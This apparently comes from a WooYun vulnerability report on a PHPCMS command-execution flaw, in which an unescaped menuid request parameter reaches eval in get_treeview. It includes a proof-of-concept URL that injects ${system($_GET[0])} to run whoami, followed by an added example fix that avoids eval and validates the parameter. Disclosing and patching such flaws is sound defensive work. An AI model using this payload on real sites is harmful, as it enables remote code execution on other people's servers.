WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online browsing -------- http://drop.zone.ci/
2015-11-20: Details reported to the vendor, awaiting vendor handling
2015-11-23: Vendor confirmed; details disclosed to the vendor only
2015-11-26: Details opened to third-party security partners (NSFOCUS, Tangchao Security Patrol)
2016-01-17: Details opened to core white hats and domain experts
2016-01-27: Details opened to regular white hats
2016-02-06: Details opened to intern white hats
2015-12-17: Details made public
The GBK build downloaded on November 10 has a command execution problem.
In tree.class.php, the get_treeview function calls eval, and the argument passed to eval happens to be controllable.
function get_treeview($myid, $effected_id = 'example', $str = "<span class='file'>\$name</span>", $str2 = "<span class='folder'>\$name</span>", $showlevel = 0, $style = 'filetree ', $currentlevel = 1, $recursion = FALSE) {
    echo "str ".$str."<br>"."str2 ".$str2;
    $child = $this->get_child($myid);
    if(!defined('EFFECTED_INIT')) {
        $effected = ' id="'.$effected_id.'"';
        define('EFFECTED_INIT', 1);
    } else {
        $effected = '';
    }
    $placeholder = '<ul><li><span class="placeholder"></span></li></ul>';
    if(!$recursion) $this->str .= '<ul'.$effected.' class="'.$style.'">';
    foreach($child as $id => $a) {
        @extract($a);
        if($showlevel > 0 && $showlevel == $currentlevel && $this->get_child($id)) $folder = 'hasChildren'; // when display-level mode is set @2011.07.01
        $floder_status = isset($folder) ? ' class="'.$folder.'"' : '';
        $this->str .= $recursion ? '<ul><li'.$floder_status.' id=\''.$id.'\'>' : '<li'.$floder_status.' id=\''.$id.'\'>';
        $recursion = FALSE;
        if($this->get_child($id)) {
            eval("\$nstr = \"$str2\";"); // the $str2 parameter is controllable...
content.php calls the get_treeview function:
if(!empty($categorys)) {
    $tree->init($categorys);
    switch($from) {
        case 'block':
            $strs = "<span class='\$icon_type'>\$add_icon<a href='?m=block&c=block_admin&a=public_visualization&menuid=".$_GET['menuid']."&catid=\$catid&type=list' target='right'>\$catname</a> \$vs_show</span>";
            $strs2 = "<img src='".IMG_PATH."folder.gif'> <a href='?m=block&c=block_admin&a=public_visualization&menuid=".$_GET['menuid']."&catid=\$catid&type=category' target='right'>\$catname</a>";
            break;
        default:
            $strs = "<span class='\$icon_type'>\$add_icon<a href='?m=content&c=content&a=\$type&menuid=".$_GET['menuid']."&catid=\$catid' target='right' onclick='open_list(this)'>\$catname</a></span>"; // our menuid parameter is concatenated in here and then passed into get_treeview
            $strs2 = "<span class='folder'>\$catname</span>";
            break;
    }
    $categorys = $tree->get_treeview(0, 'category_tree', $strs, $strs2, $ajax_show);
} else {
    $categorys = L('please_add_category');
}
include $this->admin_tpl('category_tree');
exit;
Because $_GET['menuid'] is concatenated into the template string unescaped (with from=block it lands in $strs2, which get_treeview receives as $str2 and hands to eval as a double-quoted string), a crafted menuid value becomes PHP code and leads to command execution.
POC: index.php?0=whoami&m=content&c=content&a=public_categorys&type=add&menuid=822;${system($_GET[0])}&pc_hash=vad6K3&from=block (executes the whoami command)
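As an added example, not code from the original report or from the PHPCMS project: the root cause is that a request parameter is concatenated into a template that is later evaluated with eval, so the fix is twofold, interpolate the template with plain string substitution instead of eval, and cast numeric request parameters such as menuid before they are concatenated anywhere. The helper names expand_template and safe_int_param are assumptions for this illustration; the template variable names ($catname, $catid, $icon_type, $type) follow the report.

```php
<?php
// Added example (not PHPCMS code). Replaces the eval("\$nstr = \"$str2\";")
// pattern from get_treeview() with placeholder substitution, and shows the
// integer check that should guard $_GET['menuid'] before concatenation.
// Helper names are assumptions; requires PHP 7.4+ for the arrow function.

/**
 * Expand "\$name"-style placeholders in a template by string substitution.
 * Nothing inside the template is executed, so request-supplied text that
 * ends up in the template cannot become PHP code.
 */
function expand_template(string $template, array $vars): string
{
    $map = [];
    foreach ($vars as $name => $value) {
        // Only simple identifiers are accepted as placeholder names.
        if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]*$/', $name)) {
            continue;
        }
        $map['$' . $name] = (string) $value;
    }
    // strtr() makes a single pass over the template, so a substituted
    // value is never re-scanned for further placeholders.
    return strtr($template, $map);
}

/**
 * Request parameters that only ever hold numeric ids are validated and
 * cast before use; anything that is not a pure digit string is rejected.
 */
function safe_int_param(array $query, string $key, int $default = 0): int
{
    return isset($query[$key]) && ctype_digit((string) $query[$key])
        ? (int) $query[$key]
        : $default;
}

// Constructed sample request: menuid is not a pure integer, so it is
// replaced by the default instead of being concatenated into the template.
$query  = ['menuid' => '822;not-a-number', 'catid' => '7'];
$menuid = safe_int_param($query, 'menuid');   // 0

// Templates shaped like the ones built in content.php, with the validated
// menuid concatenated in and everything else left as placeholders.
$str2 = "<span class='folder'>\$catname</span>";
$strs = "<span class='\$icon_type'><a href='?m=content&c=content&a=\$type"
      . "&menuid=" . $menuid . "&catid=\$catid' target='right'>\$catname</a></span>";

// Constructed category row; values are HTML-escaped before substitution
// because the result is emitted into the admin page as markup.
$row  = ['catname' => 'News <b>', 'catid' => 7, 'icon_type' => 'file', 'type' => 'add'];
$vars = array_map(fn($v) => htmlspecialchars((string) $v, ENT_QUOTES, 'UTF-8'), $row);

echo expand_template($str2, $vars), "\n";
echo expand_template($strs, $vars), "\n";
```

With eval removed, a menuid value containing `${...}` or `";` is just inert text inside the generated markup; the integer cast additionally keeps such a value from ever being concatenated into a URL or template in the first place, and a log line for rejected menuid values gives a simple detection hook for probing against this endpoint.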
I'll just wait and see whether it gets ignored.
Severity: Medium
Vulnerability Rank: 5
Confirmed at: 2015-11-23 15:54
Acknowledgements
None yet